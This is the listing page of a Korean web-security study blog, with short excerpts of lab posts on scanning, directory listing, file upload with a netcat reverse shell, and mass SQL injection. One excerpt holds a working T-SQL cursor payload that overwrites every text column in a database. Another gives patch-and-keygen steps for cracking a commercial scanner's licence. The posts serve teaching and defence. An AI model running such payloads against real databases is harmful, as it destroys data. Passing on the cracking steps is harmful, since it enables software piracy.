| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | ||||||
| 2 | 3 | 4 | 5 | 6 | 7 | 8 |
| 9 | 10 | 11 | 12 | 13 | 14 | 15 |
| 16 | 17 | 18 | 19 | 20 | 21 | 22 |
| 23 | 24 | 25 | 26 | 27 | 28 | 29 |
| 30 |
- Web Authentication
- ACL
- NETSEC
- Router Firewall
- docker
- Blind SQL Injection
- UTM
- GRE
- XSS
- VPN
- SQL
- Mass SQL Injection
- Vlan
- web server
- stored procedure
- AWS
- IDS
- csrf
- Websec
- Linux
- VPC
- arp
- wireshark
- DHCP
- Web
- 보안 솔루션
- Database Scheme
- sql injection
- HSRP
- snmp
- Today
- Total
목록Websec (86)
yuil :: SecOps
[WebSec] Scanning 실습
AppScan# ReadMe.txt1.Install2.copy patch.exe to $AppScan installation dir$(extc. C:\Program Files\IBM\Rational AppScan)3.Run patch.exe4.Run Keygen.exe5.Copy license.lic to $AppScan installation dir$\License(extc. C:\Program Files\IBM\Rational AppScan\License)6.run AppScan and Update the Secure database,enjoy it! install # 붙여넣기C:\Program Files\Watchfire\AppScanC:\Program Files\Watchfire\AppScan\L..
[WebSec] Directory Listing 취약점 실습
Directory Listing 취약점 xpwebhackhttp://192.168.65.20/board/http://192.168.65.20/board/upload/hyosung.jpg 상황에 따라서 심각한 정보 노출 상황이 발생할 수 있다 aircon sitehttp://192.168.65.30/aircon/main/ window 대응 방법win2k xpwebhack site 접속http://192.168.65.20/board/ linux 대응 방법centoscmdvi /etc/httpd/conf/httpd.conf# 서비스 재시작service httpd restart http://192.168.65.30/aircon/main/ 막히지 않은 사이트도 있다inurl: index of/그만 알아보자..
[WebSec] File Upload 취약점
File Upload 취약점 File Upload 공격 절차WAS 등록 확장자Web Server마다 확장자 등록이 다르다.대응책실습 [WebSec] Stored Procedure Lab 01쉘 획득하기 tftp 서버를 이용하여 nc.exe를 웹 서버로 업로드 시키고 Reverse Connection을 통해 쉘 획득- 공격자는 tftp 나 ftp 서비스를 실행하고 공격툴을 준비한다. - xp_cmdshell 를 이용하여 공격자의 서yu-il.tistory.com
[WebSec] Mass SQL Injection 대응방안
win2kmember_login_check.aspIF Len(id)>15 or Len(password)>20 Then response.write "" response.write "" response.EndEND IF Mass SQL Injection 공격은 긴 쿼리를 입력하기 때문에 id 입력 문자열 길이를 제한하는 것으로 대응이 가능하다.
[WebSec] Mass SQL Injection 실습 - Hex Encoding
hex encoding Hex (Base16) encoder & decoderA Hex (Base16, RFC 4648) encoder and decoder. Encodes and decode anything (a text or a binary file like a sound or an image ) by copy & paste or file upload.www.hexator.comdeclare @t varchar(1000), @c varchar(1000)declare cur cursor for select table_name, column_name from information_schema.columnswhere data_type like '%varchar%' or data_type like '%tex..
[WebSec] Mass SQL Injection 실습 - Cursor 02
데이터베이스 오염 공격 실행 (커서 블록)select * from boarddeclare @t varchar(1000), @c varchar(1000)declare cur cursor for select table_name, column_name from information_schema.columnswhere data_type like '%varchar%' or data_type like '%text%'open curfetch next from cur into @t, @cwhile @@fetch_status = 0 begin exec('update '+@t+' set '+@c+'=''''') fetch next from cur into @t, @c endclose curdeallocate curse..